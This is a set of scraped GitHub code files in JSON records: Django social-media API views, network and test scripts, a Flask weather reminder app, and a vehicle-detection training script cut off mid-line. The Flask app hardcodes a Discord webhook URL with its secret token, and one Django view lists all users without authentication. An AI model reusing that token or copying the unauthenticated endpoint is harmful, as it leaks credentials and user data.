self.serializer_class(data=request.data)\n if serializer.is_valid():\n email = serializer.validated_data[\"email\"]\n password = serializer.validated_data[\"password\"]\n user = authenticate(request, email=email, password=password)\n if user is not None:\n return Response(\n {\"message\": \"Login successful.\"}, status=status.HTTP_200_OK\n )\n else:\n return Response(\n {\"message\": \"Invalid email or password.\"},\n status=status.HTTP_400_BAD_REQUEST,\n )\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass UserLogoutView(APIView):\n serializer_class = UserLogoutSerializer\n permission_classes = [IsAuthenticated]\n\n def post(self, request):\n refresh_token = request.data.get(\n \"refresh\",\n )\n # Blacklist the refresh token to invalidate it\n try:\n token = RefreshToken(refresh_token)\n token.blacklist()\n return Response({\"detail\": \"Logout successful\"})\n except Exception:\n return Response({\"detail\": \"Invalid token\"}, status=401)\n\n\nclass ManageUserView(generics.RetrieveUpdateAPIView):\n serializer_class = UserSerializer\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n\n def get_object(self):\n return self.request.user\n\n\nclass UserProfileUpdateDeleteView(RetrieveUpdateDestroyAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n\n queryset = User.objects.all()\n serializer_class = UserProfileSerializer\n lookup_field = \"pk\"\n\n def get(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance)\n return Response(serializer.data)\n\n def put(self, request, *args, **kwargs):\n instance = self.get_object()\n serializer = self.get_serializer(instance, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n return Response(serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n def delete(self, request, *args, **kwargs):\n instance = self.get_object()\n self.perform_destroy(instance)\n return Response(status=status.HTTP_204_NO_CONTENT)\n\n\nclass UserDetailView(generics.RetrieveAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n serializer_class = UserProfileSerializer\n\n def get(self, request, pk):\n user = User.objects.get(pk=pk)\n serializer = self.serializer_class(user, context={\"request\": request})\n data = serializer.data\n return Response(data)\n\n def get_followers(self, request, pk):\n user = User.objects.get(pk=pk)\n followers = user.followers.all()\n serializer = self.serializer_class(followers, many=True, context={\"request\": request})\n data = serializer.data\n return Response(data)\n\n def post(self, request, pk):\n user = User.objects.get(pk=pk)\n request_user = request.user\n if request_user.is_authenticated:\n if user.followers.filter(pk=request_user.pk).exists():\n user.followers.remove(request_user)\n return Response(\n {\n \"username\": user.username,\n \"profile_picture\": user.profile_picture.url\n if user.profile_picture\n else None,\n \"followed\": False,\n },\n status=status.HTTP_200_OK,\n )\n else:\n user.followers.add(request_user)\n return Response(\n {\n \"username\": user.username,\n \"profile_picture\": user.profile_picture.url\n if user.profile_picture\n else None,\n \"followed\": True,\n },\n status=status.HTTP_200_OK,\n )\n return Response(\n {\"detail\": \"Authentication required\"}, status=status.HTTP_401_UNAUTHORIZED\n )\n\n\nclass UserProfileListAPIView(APIView):\n def get(self, request):\n profiles = User.objects.all()\n serializer = UserSerializer(profiles, many=True)\n return Response(serializer.data)\n\n\nclass UserSearchView(generics.ListAPIView):\n authentication_classes = (JWTAuthentication,)\n permission_classes = (IsAuthenticated,)\n serializer_class = UserSerializer\n queryset = User.objects.all()\n filter_backends = [filters.SearchFilter]\n search_fields = [\"username\", \"email\"]\n\n\nclass FollowingUserListAPIView(ListAPIView):\n serializer_class = FollowingSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user = self.request.user\n return user.following.all()\n\nclass FollowerListView(ListAPIView):\n serializer_class = UserSerializer\n permission_classes = [IsAuthenticated]\n\n def get_queryset(self):\n user = self.request.user\n return user.followers.all()\n","repo_name":"avkpol/social-media-API","sub_path":"user/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":7372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"1613602569","text":"#!/usr/bin/python3\nimport sys\n#print(sys.argv)\nin1 = input('Etner 1-st interface in the bundle: ')\nin2 = input('Enter 2-nd interface in the bundle: ')\nae = input('Enter ae number')\ninterface_template = [ 'set interface {int1} gigether-options 802.3ad ae{ae}',\n\t\t\t'set interface {int2} gigether-options 802.3ad ae{ae}',\n\t\t\t'set interface ae{ae} agragated-ether-options lacp periodic fast']\n#print(in1, in2, ae)\t \nprint('\\n'.join(interface_template).format(int1=in1, int2=in2, ae=ae))\n","repo_name":"arturiuslim/arthur_storage","sub_path":"arthurs_scripts/jum_ae_int.py","file_name":"jum_ae_int.py","file_ext":"py","file_size_in_byte":483,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"25199218689","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n# @Time : 2019/5/5 上午10:19\n# @Author : Chenzd\n# @Site : 读取配置文件\n# @File : readConfig.py\n# @Software: PyCharm\n# @company: LEELEN\nimport configparser\nimport os\nimport filePath\nfrom public.configLog import Logger\nlogger = Logger(logger='public.readConfig.ReadConfig').getlog()\n\nconfig_file = os.path.join(filePath.config_path, 'config.ini')\n\nclass ReadConfig:\n\n def __init__(self):\n self.configParser = configparser.ConfigParser()\n self.configParser.read(config_file)\n\n def get_email(self,name):\n value = self.configParser.get('email',name)\n logger.info('读取config.ini文件 email:[%s:%s]'%(name, value))\n return value\n\nif __name__ == '__main__':\n a = ReadConfig().get_email('mail_user')\n print(a)","repo_name":"chales20/ios_luxdomo","sub_path":"public/readConfig.py","file_name":"readConfig.py","file_ext":"py","file_size_in_byte":816,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30955299518","text":"import shlex\nimport subprocess\n\ndef execute_cmd(args, useBash = False, printOutput=True):\n \"\"\"\n Execute the external command and get its exitcode, stdout are yield.\n \"\"\"\n\n if useBash:\n args = 'bash.exe -c \"' + ' '.join(args) + '\"'\n \n print('running: ' + str(args))\n\n if printOutput:\n popen = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, universal_newlines=True)\n for stdout_line in iter(popen.stdout.readline, ''):\n print(stdout_line, end='')\n\n popen.stdout.close()\n else:\n popen = subprocess.Popen(args)\n\n return_code = popen.wait()\n if return_code:\n raise subprocess.CalledProcessError(return_code, args)\n\n","repo_name":"c-esswein/gemsearch","sub_path":"gemsearch/utils/proc.py","file_name":"proc.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38587622983","text":"import numpy as np\nimport scipy.stats as stats\nimport matplotlib.pyplot as plt\n\ndata = np.mat([[1, 200, 105, 3, False],\n [2, 165, 80, 2, False],\n [3, 184.5, 120, 2, False],\n [4, 116, 70.8, 1, False],\n [5, 270, 150, 4, True]])\n\ncoll = []\nfor row in data:\n coll.append(row[0, 1])\n\nstats.probplot(coll, plot=plt)\nplt.show()\n","repo_name":"Inspring6/OpenCV_TensorFlow","sub_path":"ch03/program3-4.py","file_name":"program3-4.py","file_ext":"py","file_size_in_byte":380,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"36389812368","text":"import os\nfrom unittest import TestCase\nimport subprocess\n\n\nclass LocustTestCase(TestCase):\n\n def test(self):\n path = os.path.abspath(\n os.path.join(\n os.path.dirname(__file__),\n 'django/project/db.sqlite3'\n )\n )\n subprocess.call(['cp', os.devnull, path])\n subprocess.Popen(\n ['python tests/django/project/manage.py migrate && '\n 'python tests/django/project/manage.py runserver'],\n shell=True\n )\n popen = subprocess.Popen([\n 'locust', '-f', 'tests/_locust.py', '--clients=2',\n '--no-web', '--host=http://127.0.0.1:8000'\n ])\n pid = popen.pid\n subprocess.call([\n '''\n sleep 20 && kill {pid}\n '''.format(\n pid=pid\n )\n ], shell=True)\n popen.wait()\n subprocess.call([\n '''\n ps aux |grep manage | grep runserver |\n awk {{'print $2'}} | xargs kill\n '''\n ], shell=True)\n self.assertEquals(popen.returncode, 0)\n","repo_name":"sergeyglazyrindev/gherkin-locust","sub_path":"tests/test_adapters.py","file_name":"test_adapters.py","file_ext":"py","file_size_in_byte":1115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"41236648900","text":"\"\"\" dl_model_eval.py: \n \n This program is used to separately evaluate the model with the eval dataset.\n \n A CSV containing the eval dataset is iterated through and the model is used to predict the label of each Tweet.\n\"\"\"\n\n__author__ = \"Breydon Verryt-Reid\"\n__date__ = \"28 Sep 22\"\n__version__ = 1.5\n__status__ = \"Complete\"\n__notes__ = \"This program is intended to be run as a standalone program\"\n\n# importing required libraries\n# !pip install transformers\nfrom transformers import pipeline, AutoModelForSequenceClassification\nimport csv\n\ndef dlmodelmain(input):\n \"\"\" This function contains the model which takes in a string or list of strings and performs an analysis of that text\n\n ** Parameters **\n input: a str containing the body of a Tweet (after being preprocessed)\n\n ** Returns **\n N/A\n \"\"\"\n model = AutoModelForSequenceClassification.from_pretrained(\"bvrau/covid-twitter-bert-v2-struth\", num_labels=2) # this is the model that was trained\n pipe = pipeline(\"text-classification\", model=model, tokenizer=\"bvrau/covid-twitter-bert-v2-struth\", top_k=2, function_to_apply=\"sigmoid\") # this is the pipeline that is used to make predictions\n result = pipe(input) # this is the prediction\n print(result,\"\\n\") # prints the prediction result\n \n # this section of code is used to return the predicted label and score - not in use\n # resultdict = result[0]\n # label = resultdict['label']\n # score = resultdict['score']\n # print(\"** Results **\")\n # print(\"Determination: \"+label)\n # print(\"Certainty: \"+str(score)) \n # return label, score\n\ndef dataloader(file):\n \"\"\" This function loads the data from the csv file and lists item by item the expected output.\n The data is then passed to the dlmodelmain function for pipeline prediction.\n The results are then compared to the expected output and the accuracy is calculated.\n\n ** Parameters **\n N/A\n\n ** Returns **\n N/A\n \"\"\" \n test = file\n with open(test, 'r') as csvfile: # opens the csv file\n datareader = csv.reader(csvfile, delimiter=',') # reads the csv file\n next(datareader) # skips the first row of the csv file (headers)\n for row in datareader: # iterates through each row of the csv file\n if row[0] == \"0\": \n actual = \"real\" # sets the expected output to real\n elif row[0] == \"1\":\n actual = \"fake\" # sets the expected output to fake\n print(\"This should be classified: \", actual) # prints the expected output\n dlmodelmain(row[1]) # passes the Tweet body to the dlmodelmain function for prediction\n\ndataloader(\"preproc_data_eval.csv\")","repo_name":"Struth-Social-UNSW/ITProject2","sub_path":"Backend/deep-learn-algo/train_test/dl_model_eval.py","file_name":"dl_model_eval.py","file_ext":"py","file_size_in_byte":2767,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"30792608133","text":"import sys\nimport time\nimport subprocess\nfrom subprocess import PIPE, Popen\nfrom threading import Thread\nfrom queue import Queue, Empty # python 3.x\n\n# Django Thread\ndef start_django():\n subprocess.call(['python', './servers/manage.py', 'runserver', '0.0.0.0:8000'])\n\ndjangoThread = Thread(target=start_django, name=\"Django Thread\")\ndjangoThread.start()\n\n\ntime.sleep(2)\n\ndef start_clients():\n subprocess.call(['python', './clients.py'])\n\nclientsThread = Thread(target=start_clients, name=\"Clients Thread\")\nclientsThread.start()\n\n\ntime.sleep(3)\n\ndef start_simulation():\n subprocess.call(['python', './__main__.py'])\n\nsimulationThread = Thread(target=start_simulation, name=\"Simulation Thread\")\nsimulationThread.start()\n\n\n","repo_name":"imran1161/Access-Control-Framework","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"70161342172","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('profiles', '0003_auto_20170705_0313'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='profiles',\n name='locations',\n field=models.CharField(blank=True, max_length=120, default='My Location Default', null=True),\n ),\n ]\n","repo_name":"csp5096/python3.5-django-ecommerce","sub_path":"src/profiles/migrations/0004_auto_20170705_0316.py","file_name":"0004_auto_20170705_0316.py","file_ext":"py","file_size_in_byte":463,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"27905926095","text":"from geopy.geocoders import Nominatim\nfrom flask import *\nimport requests\nimport json\nimport getweather\nimport threading\nimport time\nimport schedule\n\napp = Flask(__name__)\n\n# calling the nominatim tool\ngeoLoc = Nominatim(user_agent=\"GetLoc\")\n \n\nweather_api_url = \"https://opendata.cwa.gov.tw/api/v1/rest/datastore/F-C0032-001\"\n#\"latitude\":\"25.0575931\",\"longitude\":\"121.3625344\"\n@app.route('/get_weather', methods=['GET'])\ndef get_weather():\n data = request.get_json()\n authorization = data.get('Authorization')\n latitude = data.get('latitude')\n longitude = data.get('longitude')\n # location = data.get('locationName')\n locname = geoLoc.reverse(\"25.0575931, 121.3625344\")\n address_parts = locname.address.split(\", \")\n if len(address_parts) >= 4:\n location = address_parts[-3]#縣市\n district = address_parts[-4]#區域\n print(\"縣市:\", location)\n print(\"區域:\", district)\n else:\n print(\"地址訊息不足\")\n print(locname.address)\n if not authorization or not latitude or not longitude:\n return jsonify({'error': '前端缺少參數'})\n\n params = {\n 'Authorization': authorization,\n 'locationName': location,\n 'format': 'JSON', \n }\n try:\n response = requests.get(weather_api_url, params=params)\n response.raise_for_status() \n\n try:\n weather_data = response.json()\n return jsonify(weather_data)\n except json.JSONDecodeError as e:\n return jsonify({'error': 'API無法解析為json'})\n\n except requests.exceptions.RequestException as e:\n return jsonify({'error': 'API請求失敗'})\n\n@app.route(\"/\")\ndef index():\n\treturn render_template(\"index.html\")\n\ndef sendmsg(name,content):\n webhook_url=\"https://discordapp.com/api/webhooks/1163495849842704565/I7SJdtkonFMMvuXFs3GQTshXtwCB47N3juFGLNtBf1bLAevRIXukZdH82j31jfhRbCxQ\"\n data={\"content\":\"Hi \"+name+\",\\n\"+content}\n headers = {'Content-Type': 'application/json'}\n requests.post(webhook_url, data=json.dumps(data), headers=headers) \n #time.sleep(28800)\n time.sleep(60)\n\n\n#control=0 =>will not send msg to discord\ncontrol=0\n\ndef schedule_sendmsg(name,content):\n global control\n while control==1:\n #schedule.every().monday.at(\"09:00\").do(sendmsg,name,content[0])#早上發\n #schedule.every().tuesday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().wednesday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().thursday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().friday.at(\"09:00\").do(sendmsg,name,content[0])\n #schedule.every().monday.at(\"18:00\").do(sendmsg,name,content[1])#晚上發\n #schedule.every().tuesday.at(\"18:00\").do(sendmsg,name,content[1])\n #schedule.every().wednesday.at(\"18:00\").do(sendmsg,name,content[1])\n #schedule.every().thursday.at(\"18:00\").do(sendmsg,name,content[1])\n #schedule.every().friday.at(\"18:00\").do(sendmsg,name,content[1])\n schedule.every().friday.at(\"19:25\").do(sendmsg,name,content[1])\n schedule.run_pending()\n time.sleep(60)\n\n#set control=1 and open clock to send msg to discord\n@app.route('/api/remind', methods=['GET'])\ndef api_remind():\n global control\n #need to add query string ex: /api/remind?username=123&cityselect=新北市\n city=request.args.get(\"cityselect\")\n username=request.args.get(\"username\")\n data=getweather.get_location_weather(city)\n try:\n control=1\n task_thread = threading.Thread(target=schedule_sendmsg, args=(username, data))\n task_thread.daemon = True\n task_thread.start()\n\n data = {\"message\":\"成功發送\"}\n return jsonify(data)\n except Exception as e:\n return jsonify({\"error\":\"發送失敗\"+str(e)})\n\n\n#set control=0 and turn off reminder\n@app.route('/api/turnoff', methods=['GET'])\ndef api_turnoff():\n global control\n try:\n control=0\n print(control)\n data = {\"message\":\"成功關閉\"}\n return jsonify(data)\n except Exception as e:\n return jsonify({\"error\":\"關閉失敗\"+str(e)})\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)","repo_name":"jason407891/fifth-team-weather","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":4204,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"29944405407","text":"\ndef min_removals(txt1, txt2):\n x=list(txt1)\n y=list(txt2)\n y.sort()\n d=\"\".join(y)\n e=\"\".join(x)\n z=[]\n for i in range(len(x)):\n if x[i] in y:\n z.append(x[i])\n a=(\"\".join(z))\n b=d.strip(a)\n c=e.strip(a)\n return(len(b)+len(c))\n\n","repo_name":"daniel-reich/ubiquitous-fiesta","sub_path":"KYGpco9NFmJRyMQqj_14.py","file_name":"KYGpco9NFmJRyMQqj_14.py","file_ext":"py","file_size_in_byte":252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"38594415319","text":"import RPi.GPIO as GPIO\nimport time\nimport random\nrandom.seed()\n\n#set pins\nGPIO.setmode (GPIO.BOARD)\nGPIO.setwarnings (False)\nGPIO.setup (11, GPIO.OUT) #laser power\nGPIO.setup (13, GPIO.OUT) #X-servo\nGPIO.setup (15, GPIO.OUT) #Y-servo\nGPIO.setup (19, GPIO.IN, pull_up_down=GPIO.PUD_UP) #in from IR\n\n#setup servo pwm\np = GPIO.PWM (13, 50)\nq = GPIO.PWM (15, 50)\n\n#set both servos to center to start\np.start (7.5)\nq.start (7.5)\n\ndef moveServos():\n \"Turns on laser and moves X- and Y-servos randomly\"\n lightLaser ()\n\n p.ChangeDutyCycle (random.randint (8, 12))\n time.sleep (random.random())\n q.ChangeDutyCycle (random.randint (8, 12))\n time.sleep (random.random())\n\n p.ChangeDutyCycle (random.randint (3, 5))\n time.sleep (random.random())\n q.ChangeDutyCycle (random.randint (3, 5))\n time.sleep (random.random())\n\n dimLaser ()\n\ndef lightLaser():\n GPIO.output (11, 1)\n\ndef dimLaser():\n GPIO.output (11, 0)\n\n#main loop\nwhile True:\n #check for input from sensor\n if GPIO.input (19):\n moveServos()\n time.sleep (0.5) #wait a half sec before polling sensor\n else:\n dimLaser()\n time.sleep (0.5)\n","repo_name":"Apress/Learn-Rasp-Pi-Program-Python","sub_path":"Chapter9/cat_toy.py","file_name":"cat_toy.py","file_ext":"py","file_size_in_byte":1159,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"32"}
+{"seq_id":"37308223913","text":"import torch\nfrom torch.distributed import barrier\nimport os\n\nfrom cmdline import *\nfrom atlas import *\n\noasis_ds_std = OASISDataset(crop=None,\n h5path=f'{prefix}convaffinestd_{suffix}.h5',\n pooling=None,\n one_scan_per_subject=False)\noasis_ds_test_std = OASISDataset(crop=None,\n h5path=f'{prefix}convaffinestd_test_{suffix}.h5',\n pooling=None,\n one_scan_per_subject=False)\n\ndeepaffinefile = f'{prefix}deepaffine_{suffix}.pth'\nI_deepaffine, affine_net, epoch_losses_deepaffine, full_losses_deepaffine, \\\n iter_losses_deepaffine, test_losses_deepaffine \\\n = torch.load(deepaffinefile, map_location=loc)\nI_deepaffine = I_deepaffine.to(loc)\n\nfluid_params = [.1,0,.01]\nreg_weight = 1e4\n\nif rank == 0: torch.save(fluid_params, f'{prefix}fluidparams_{suffix}.pth')\nconvlddmmfile = f'{prefix}convlddmm_{suffix}.pth'\nif not os.path.isfile(convlddmmfile): # conventional lddmm atlas\n print(\"Conventional LDDMM atlas building\")\n res = lddmm_atlas(dataset=oasis_ds_std,\n I0=I_deepaffine.clone().to('cuda'),\n fluid_params=fluid_params,\n learning_rate_pose=1e-3,\n learning_rate_image=5e4,\n reg_weight=reg_weight,\n momentum_preconditioning=False,\n batch_size=30,\n num_epochs=500,\n gpu=gpu,\n world_size=args.world_size,\n rank=rank)\n if rank == 0: torch.save(res, convlddmmfile)\nelse:\n torch.load(convlddmmfile, map_location='cpu')\nbarrier()\nIlddmm, _, _, _ = res\nIlddmm = Ilddmm.to(loc)\n\n# On the test set, use same atlas-building code but with zero learning rate for\n# the image\nconvlddmmtestfile = f'{prefix}convlddmm_test_{suffix}.pth'\nif not os.path.isfile(convlddmmtestfile): # conventional lddmm atlas\n print(\"Conventional LDDMM Test\")\n res = lddmm_atlas(dataset=oasis_ds_test_std,\n I0=Ilddmm,\n fluid_params=fluid_params,\n learning_rate_pose=1e-3,\n learning_rate_image=0e4,\n momentum_preconditioning=False,\n reg_weight=reg_weight,\n batch_size=30,\n num_epochs=1,\n lddmm_steps=500,\n gpu=gpu,\n world_size=args.world_size,\n rank=rank)\n if rank == 0: torch.save(res, convlddmmtestfile)\n del res\n#Ilddmm, mom_lddmm, epoch_losses, iter_losses = torch.load(convlddmmtestfile,\n #map_location=loc)\n","repo_name":"jacobhinkle/diffeomorphic_autoencoders","sub_path":"run_convlddmm.py","file_name":"run_convlddmm.py","file_ext":"py","file_size_in_byte":3208,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"32"}
+{"seq_id":"25461703327","text":"import pygame\nfrom GObject import GObject, Constants\nfrom text import Text\nfrom graph import Graph\n\n\nclass ControlPanel(GObject):\n def __init__(self):\n pygame.sprite.Sprite.__init__(self)\n self.width = 300\n self.image = pygame.Surface((self.width, Constants.HEIGHT.value))\n self.image.set_alpha(100)\n self.image.fill(Constants.WHITE.value)\n self.rect = self.image.get_rect()\n self.rect.right = Constants.WIDTH.value\n self.rect.bottom = Constants.HEIGHT.value\n # GObject.all_objects.add(self)\n GObject.control_panel.add(self)\n\n self.population_graph = Graph(y=GObject.current_population_list,\n x=GObject.duration_cell_list,\n size=(250, 150))\n self.population_graph.rect.centerx, self.population_graph.rect.top = (Constants.WIDTH.value - 150, 20)\n self.population_graph.color = Constants.RED.value\n self.population_graph.xlabel.text = 'Frames'\n self.population_graph.ylabel.text = 'Count of cells'\n\n self.current_food_graph = Graph(y=GObject.current_food_list,\n x=GObject.duration_food_list,\n size=(250, 150))\n self.current_food_graph.rect.centerx = Constants.WIDTH.value - 150\n self.current_food_graph.rect.top = self.population_graph.rect.bottom + 40\n self.current_food_graph.color = Constants.BLUE.value\n self.current_food_graph.xlabel.text = 'Frames'\n self.current_food_graph.ylabel.text = 'Count of food'\n\n self.count_of_extinction = Text(30)\n self.fps = Text(30)\n self.duration = Text(30)\n self.current_food = Text(30)\n self.total_food = Text(30)\n self.current_population = Text(30)\n self.total_born = Text(30)\n\n def update(self):\n self.count_of_extinction.update(text=f'Count of extinction: {GObject.count_of_extinction}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 210),\n color=Constants.BLACK.value)\n self.duration.update(text=f'Duration: {GObject.duration // 60}m or {GObject.duration // 3600}h',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 180),\n color=Constants.BLACK.value)\n self.fps.update(text=f'FPS: {GObject.fps}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 150),\n color=Constants.BLACK.value)\n self.current_food.update(text=f'Current food: {len(GObject.food)}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 120),\n color=Constants.BLACK.value)\n self.total_food.update(text=f'Total food: {GObject.count_of_food_ever}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 90),\n color=Constants.BLACK.value)\n self.current_population.update(text=f'Current population: {len(GObject.cells)}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 60),\n color=Constants.BLACK.value)\n self.total_born.update(text=f'Total born: {GObject.count_of_cells_ever}',\n xy=(Constants.WIDTH.value - 150, Constants.HEIGHT.value - 30),\n color=Constants.BLACK.value)\n self.population_graph.update()\n self.current_food_graph.update()\n\n def draw(self):\n pygame.display.get_surface().blit(self.image, (self.rect.x, self.rect.y))\n self.count_of_extinction.draw()\n self.duration.draw()\n self.fps.draw()\n self.current_food.draw()\n self.total_food.draw()\n self.current_population.draw()\n self.total_born.draw()\n self.population_graph.draw()\n self.current_food_graph.draw()\n","repo_name":"vallenov/TheLittleLife","sub_path":"control_panel.py","file_name":"control_panel.py","file_ext":"py","file_size_in_byte":4062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"24094968130","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Apr 22 07:40:04 2017\n\n@author: jerome\n\"\"\"\n\nimport matplotlib.image as mpimg\nimport matplotlib.pyplot as plt\nimport numpy as np\nimport cv2\nimport glob\nimport time\nimport pickle\nfrom sklearn.svm import LinearSVC\nfrom sklearn.svm import SVC\nfrom sklearn.preprocessing import StandardScaler\nfrom skimage.feature import hog\nfrom lesson_functions import *\nfrom find_object import *\n# NOTE: the next import is only valid for scikit-learn version <= 0.17\n# for scikit-learn >= 0.18 use:\nfrom sklearn.model_selection import train_test_split\n#from sklearn.cross_validation import train_test_split\nfrom sklearn.model_selection import GridSearchCV\n# Define a function to extract features from a single image window\n# This function is very similar to extract_features()\n# just for a single image rather than list of images\ndef single_img_features(img, color_space='RGB', spatial_size=(32, 32),\n hist_bins=32, orient=9, \n pix_per_cell=8, cell_per_block=2, hog_channel=0,\n spatial_feat=True, hist_feat=True, hog_feat=True): \n #1) Define an empty list to receive features\n img_features = []\n #2) Apply color conversion if other than 'RGB'\n if color_space != 'RGB':\n if color_space == 'HSV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HSV)\n elif color_space == 'LUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2LUV)\n elif color_space == 'HLS':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n elif color_space == 'YUV':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n elif color_space == 'YCrCb':\n feature_image = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n elif color_space == 'SVCb':\n feature_image1 = cv2.cvtColor(img, cv2.COLOR_RGB2HLS)\n feature_image2 = cv2.cvtColor(img, cv2.COLOR_RGB2YUV)\n feature_image3 = cv2.cvtColor(img, cv2.COLOR_RGB2YCrCb)\n feature_image = np.dstack((feature_image1[:,:,2],feature_image2[:,:,2],feature_image3[:,:,2]))\n else: feature_image = np.copy(img) \n #3) Compute spatial features if flag is set\n if spatial_feat == True:\n spatial_features = bin_spatial(feature_image, size=spatial_size)\n #4) Append features to list\n img_features.append(spatial_features)\n #5) Compute histogram features if flag is set\n if hist_feat == True:\n hist_features = color_hist(feature_image, nbins=hist_bins)\n #6) Append features to list\n img_features.append(hist_features)\n #7) Compute HOG features if flag is set\n if hog_feat == True:\n if hog_channel == 'ALL':\n hog_features = []\n for channel in range(feature_image.shape[2]):\n hog_features.extend(get_hog_features(feature_image[:,:,channel], \n orient, pix_per_cell, cell_per_block, \n vis=False, feature_vec=True)) \n else:\n hog_features = get_hog_features(feature_image[:,:,hog_channel], orient, \n pix_per_cell, cell_per_block, vis=False, feature_vec=True)\n #8) Append features to list\n img_features.append(hog_features)\n\n #9) Return concatenated array of features\n return np.concatenate(img_features)\n\n# Define a function you will pass an image \n# and the list of windows to be searched (output of slide_windows())\ndef search_windows(img, windows, clf, scaler, color_space='RGB', \n spatial_size=(32, 32), hist_bins=32, \n hist_range=(0, 256), orient=9, \n pix_per_cell=8, cell_per_block=2, \n hog_channel=0, spatial_feat=True, \n hist_feat=True, hog_feat=True):\n\n #1) Create an empty list to receive positive detection windows\n on_windows = []\n #2) Iterate over all windows in the list\n for window in windows:\n #3) Extract the test window from original image\n test_img = cv2.resize(img[window[0][1]:window[1][1], window[0][0]:window[1][0]], (64, 64)) \n #4) Extract features for that window using single_img_features()\n features = single_img_features(test_img, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n #5) Scale extracted features to be fed to classifier\n test_features = scaler.transform(np.array(features).reshape(1, -1))\n #6) Predict using your classifier\n prediction = clf.predict(test_features)\n #7) If positive (prediction == 1) then save the window\n if prediction == 1:\n on_windows.append(window)\n #8) Return windows for positive detections\n return on_windows\n\n# Read in cars and notcars from large dataset\ncars = glob.glob('./dataset/vehicles/*/*.png')\nnotcars = glob.glob('./dataset/non-vehicles/*/*.png')\n\n### TODO: Tweak these parameters and see how the results change.\ncolor_space = 'YCrCb' # Can be RGB, HSV, LUV, HLS, YUV, YCrCb\norient = 9 # HOG orientations\npix_per_cell = 8 # HOG pixels per cell\ncell_per_block = 2 # HOG cells per block\nhog_channel = \"ALL\" # Can be 0, 1, 2, or \"ALL\"\nspatial_size = (16, 16) # Spatial binning dimensions\nhist_bins = 16 # Number of histogram bins\nspatial_feat = True # Spatial features on or off\nhist_feat = True # Histogram features on or off\nhog_feat = True # HOG features on or off\ny_start_stop = [None, None] # Min and max in y to search in slide_window()\n\ncar_features = extract_features(cars, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\nnotcar_features = extract_features(notcars, color_space=color_space, \n spatial_size=spatial_size, hist_bins=hist_bins, \n orient=orient, pix_per_cell=pix_per_cell, \n cell_per_block=cell_per_block, \n hog_channel=hog_channel, spatial_feat=spatial_feat, \n hist_feat=hist_feat, hog_feat=hog_feat)\n\nX = np.vstack((car_features, notcar_features)).astype(np.float64) \n# Fit a per-column scaler\nX_scaler = StandardScaler().fit(X)\n# Apply the scaler to X\nscaled_X = X_scaler.transform(X)\n\n# Define the labels vector\ny = 